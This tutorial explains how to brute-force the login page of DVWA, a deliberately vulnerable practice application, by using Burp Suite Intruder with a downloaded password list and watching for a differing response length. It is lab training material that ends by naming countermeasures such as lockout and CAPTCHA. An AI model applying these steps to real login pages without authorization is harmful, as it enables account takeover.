How to Perform a Brute Force Attack on DVWA Using Burp Suite

Introduction

Damn Vulnerable Web Application (DVWA) is a great platform for practicing ethical hacking techniques. In this tutorial, we will explore how to perform a brute-force attack on the DVWA login page using Burp Suite. We will specifically focus on the low-security level, demonstrating how attackers exploit weak authentication mechanisms. This guide is meant for educational purposes only.

Prerequisites

Before starting, ensure you have:

• A properly installed and configured DVWA running on a local server (XAMPP, WAMP, etc.).

GitHub Link: https://github.com/digininja/DVWA

• Burp Suite Community or Professional Edition installed.

Download Link: https://portswigger.net/burp

• Basic understanding of HTTP requests and penetration testing methodologies.

Step 1: Intercept the Login Request

1. Open Burp Suite and configure your browser to use Burp’s proxy.

1. Navigate to DVWA’s login page and enter any random credentials.

1. In Burp Suite, under the Proxy > HTTP history tab, locate the intercepted POST request sent to authenticate the user.

Step 2: Send Request to Burp Intruder

1. Right-click on the captured request and select Send to Intruder.

1. Navigate to the Intruder tab and choose the Positions sub-tab.
2. Click Clear § to remove all automatically marked parameters.

1. Highlight the value of the password field and click Add § to set it as the payload position.

Step 3: Configure the Payload

1. Go to the Payloads sub-tab in Intruder.

1. Go to the link: https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/passwords_quick.txt and get a copy of the following passwords: (You can use different ones)
2. And paste it in Payload Configuration.
3. Alternatively, you can manually enter common passwords like admin, password, 123456.

Step 4: Start the Attack

1. Click Start Attack to begin brute-forcing.

1. Observe the status codes and content lengths in the results.
2. The correct password will have a response that differs from the rest.

Step 5: Verify the Password

1. Identify the entry with a unique response length.
2. Enter the discovered password in the DVWA login page.
3. If successful, you will be logged into the application.

Conclusion

Brute-force attacks exploit weak authentication mechanisms. On DVWA’s low-security level, there are no protections such as rate limiting or account lockout. However, at higher security levels, countermeasures like CAPTCHA, CSRF tokens, or time-based lockouts come into play.

This tutorial demonstrated how attackers use Burp Suite’s Intruder to automate password guessing. Ethical hackers and security professionals should use such knowledge to implement stronger security measures and protect their applications from brute-force attacks.